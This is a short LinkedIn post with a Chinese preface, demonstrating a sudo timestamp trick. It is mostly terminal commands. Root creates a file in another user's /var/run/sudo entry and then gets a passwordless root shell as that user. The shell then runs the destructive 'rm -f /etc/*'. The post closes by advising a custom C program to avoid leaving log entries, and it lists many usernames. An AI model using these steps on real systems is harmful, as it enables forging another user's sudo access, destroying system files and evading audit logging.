以下是本人在Linkedin发的一个帖子:
I know sudo has many security issues along the years, and this is just one problem that's bad enough.
Here is the example attacker could use it to do bad things:
On one window:
root@analy:/$ tty
/dev/pts/1
root@analy:~$ su wgong
wgong@analy:/$
On another window:
root@analy:sudo$ pwd
/var/run/sudo
root@analy:sudo$ ls
_pam_timestamp_key caburiar davidn gagans jawadk nickc ponnusva sohenoor veeral zhoub
amirm chaumong eladn gambhisr jeesuna oswaldod qualys-scan sysadmin warrene
badris couttsa feroza gawalis jeffc pavlenkoi root taddm wgong
bobv covim forrestl greeffn minaa pomfretj silvae tothp zhens
root@analy:sudo$ touch wgong/1
Then on 1st window,
wgong@analy:/$ sudo bash
root@analy:/# rm -f /etc/*
Of course, you need to develop a simple C program to do the equivalent thing "su wgong" does to avoid being logged.